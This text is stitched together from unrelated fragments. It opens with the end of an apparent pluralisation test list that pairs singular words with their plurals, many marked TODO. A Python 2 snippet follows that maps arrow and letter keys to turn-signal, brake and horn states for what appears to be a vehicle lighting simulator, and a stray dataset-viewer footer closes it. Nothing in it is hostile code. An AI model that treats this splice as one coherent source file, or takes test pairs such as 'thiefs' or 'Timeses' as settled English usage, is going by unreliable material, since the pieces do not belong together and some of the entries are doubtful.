rhinoceros -> rhinoceroses|rhinoceros
TODO:siverb roes -> roe
Rom -> Roma
Romagnese -> Romagnese
Roman -> Romans
Romanese -> Romanese
Romany -> Romanies
romeo -> romeos
roof -> roofs
rostrum -> rostrums|rostra
ruckus -> ruckuses
salmon -> salmon
Sangirese -> Sangirese
TODO: siverb sank -> sank
Sarawakese -> Sarawakese
sarcoma -> sarcomas|sarcomata
sassafras -> sassafrases
saw -> saw # VERB FORM (1st/2nd pers.)
saw -> saws # NOUN FORM
saws -> saw # VERB FORM (3rd pers.)
scarf -> scarves
schema -> schemas|schemata
scissors -> scissors
Scotsman -> Scotsmen
sea-bass -> sea-bass
seaman -> seamen
self -> selves
Selman -> Selmans
Senegalese -> Senegalese
seraph -> seraphs|seraphim
series -> series
TODO:siverb shall eat -> shall eat
shaman -> shamans
Shavese -> Shavese
Shawanese -> Shawanese
TODO:singular_noun multivalue she -> they
sheaf -> sheaves
shears -> shears
sheep -> sheep
shelf -> shelves
TODO:siverb shoes -> shoe
TODO:siverb should have -> should have
Siamese -> Siamese
siemens -> siemens
Sienese -> Sienese
Sikkimese -> Sikkimese
silex -> silices
simplex -> simplexes|simplices
Singhalese -> Singhalese
Sinhalese -> Sinhalese
sinus -> sinuses|sinus
size -> sizes
sizes -> size #VERB FORM
smallpox -> smallpox
Smith -> Smiths
TODO:siverb snowshoes -> snowshoe
Sogdianese -> Sogdianese
soliloquy -> soliloquies
solo -> solos|soli
soma -> somas|somata
TODO:singular_noun tough son of a bitch -> sons of bitches
Sonaman -> Sonamans
soprano -> sopranos|soprani
TODO:siverb sought -> sought
TODO:siverb spattlehoes -> spattlehoe
species -> species
spectrum -> spectrums|spectra
speculum -> speculums|specula
TODO:siverb spent -> spent
spermatozoon -> spermatozoa
sphinx -> sphinxes|sphinges
spokesperson -> spokespeople|spokespersons
stadium -> stadiums|stadia
stamen -> stamens|stamina
status -> statuses|status
stereo -> stereos
stigma -> stigmas|stigmata
stimulus -> stimuli
stoma -> stomas|stomata
stomach -> stomachs
storey -> storeys
story -> stories
stratum -> strata
strife -> strifes
stylo -> stylos
stylus -> styluses|styli
succubus -> succubuses|succubi
Sudanese -> Sudanese
suffix -> suffixes
Sundanese -> Sundanese
superior -> superiors
TODO:singular_noun Surgeon-General -> Surgeons-General
surplus -> surpluses
Swahilese -> Swahilese
swine -> swines|swine
TODO:singular_noun multiple return syringe -> syringes
syrinx -> syrinxes|syringes
tableau -> tableaus|tableaux
Tacoman -> Tacomans
talouse -> talouses
tattoo -> tattoos
taxman -> taxmen
tempo -> tempos|tempi
Tenggerese -> Tenggerese
testatrix -> testatrixes|testatrices
testes -> testes
TODO:singular_noun multiple return testis -> testes
TODO:siadj that -> those
TODO:siadj their -> their # POSSESSIVE FORM (GENDER-INCLUSIVE)
TODO:singular_noun multiple return themself -> themselves # ugly but gaining currency
TODO:singular_noun multiple return they -> they # for indeterminate gender
thief -> thiefs|thieves
TODO:siadj this -> these
thought -> thoughts # NOUN FORM
thought -> thought # VERB FORM
TODO:siverb throes -> throe
TODO:siverb ticktacktoes -> ticktacktoe
Times -> Timeses
Timorese -> Timorese
TODO:siverb tiptoes -> tiptoe
Tirolese -> Tirolese
titmouse -> titmice
TODO:singular_noun multivalue to her -> to them
TODO:singular_noun multivalue to herself -> to themselves
TODO:singular_noun multivalue to him -> to them
TODO:singular_noun multivalue to himself -> to themselves
to it -> to them
to it -> to them # ACCUSATIVE
to itself -> to themselves
to me -> to us
to myself -> to ourselves
TODO:singular_noun multivalue to them -> to them # for indeterminate gender
TODO:singular_noun multivalue to themself -> to themselves # ugly but gaining currency
to you -> to you
to yourself -> to yourselves
Tocharese -> Tocharese
TODO:siverb toes -> toe
tomato -> tomatoes
Tonkinese -> Tonkinese
tonsillitis -> tonsillitises|tonsillitides
tooth -> teeth
Torinese -> Torinese
torus -> toruses|tori
trapezium -> trapeziums|trapezia
trauma -> traumas|traumata
travois -> travois
trellis -> trellises
TODO:siverb tries -> try
trilby -> trilbys
trousers -> trousers
trousseau -> trousseaus|trousseaux
trout -> trout
TODO:siverb try -> tries
tuna -> tuna
turf -> turfs|turves
Tyrolese -> Tyrolese
ultimatum -> ultimatums|ultimata
umbilicus -> umbilicuses|umbilici
umbra -> umbras|umbrae
TODO:siverb undershoes -> undershoe
TODO:siverb unshoes -> unshoe
uterus -> uteruses|uteri
vacuum -> vacuums|vacua
vellum -> vellums
velum -> velums|vela
Vermontese -> Vermontese
Veronese -> Veronese
vertebra -> vertebrae
vertex -> vertexes|vertices
Viennese -> Viennese
Vietnamese -> Vietnamese
virtuoso -> virtuosos|virtuosi
virus -> viruses
vixen -> vixens
vortex -> vortexes|vortices
walrus -> walruses
TODO:siverb was -> were
TODO:siverb was faced with -> were faced with
TODO:siverb was hoping -> were hoping
Wenchowese -> Wenchowese
TODO:siverb were -> were
TODO:siverb were found -> were found
wharf -> wharves
whiting -> whiting
Whitmanese -> Whitmanese
whiz -> whizzes
TODO:singular_noun multivalue whizz -> whizzes
widget -> widgets
wife -> wives
wildebeest -> wildebeests|wildebeest
will -> will # VERB FORM
will -> wills # NOUN FORM
will eat -> will eat # VERB FORM
wills -> will # VERB FORM
wish -> wishes
TODO:singular_noun multivalue with him -> with them
with it -> with them # ACCUSATIVE
TODO:siverb woes -> woe
wolf -> wolves
woman -> women
woman of substance -> women of substance
TODO:siadj woman's -> women's # POSSESSIVE FORM
won't -> won't # VERB FORM
woodlouse -> woodlice
Yakiman -> Yakimans
Yengeese -> Yengeese
yeoman -> yeomen
yeowoman -> yeowomen
yes -> yeses
Yokohaman -> Yokohamans
you -> you
TODO:siadj your -> your # POSSESSIVE FORM
yourself -> yourselves
Yuman -> Yumans
Yunnanese -> Yunnanese
zero -> zeros
zoon -> zoa
'''.split('\n')
|
turnsignal_min = 0
turnsignal_max = 255
turnsignal_step = 15
turnsignal_delay = 0.1
brakelight_min = 75
brakelight_max = 255
brakelight_step = 100
brakelight_delay = 0.1
def input_turnr(key): # returns the state of the right turn input
if key == 77: # (right arrow)
return 1
else:
return 0
def input_start(key): # returns the state of the start input
if key == 115: # (s)
return 1
else:
return 0
def input_horn(key): # returns the state of the horn input
if key == 104: # (h)
return 1
else:
return 0
def input_turnl(key): # returns the state of the left turn input
if key == 75: # (left arrow)
return 1
else:
return 0
def input_config(key): # returns the state of the config input
return 0
def input_light(key): # returns the state of the light input
if key == 108: # (l)
return 1
else:
return 0
def input_brake(key): # returns the state of the brake input
if key == 80: # (down arrow)
return 1
else:
return 0
def input_lock(key): # returns the state of the lock input
return 0
def output_turnr(o): # sets right turn output to given value
print "Right Turn: " + str(o) + '\n'
return 0
def output_start(o): # sets start output to given value
return 0
def output_horn(o): # sets horn output to given value
return 0
def output_turnl(o): # sets left turn output to given value
print "Left Turn: " + str(o) + '\n'
return 0
def output_lightlo(o): # sets light lo output to given value
return 0
def output_lighthi(o): # sets light hi output to given value
return 0
def output_brake(o): # sets brake output to given value
print "Brake: " + str(o) + '\n'
return 0
def output_aux(o): # sets aux output to given value
return 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.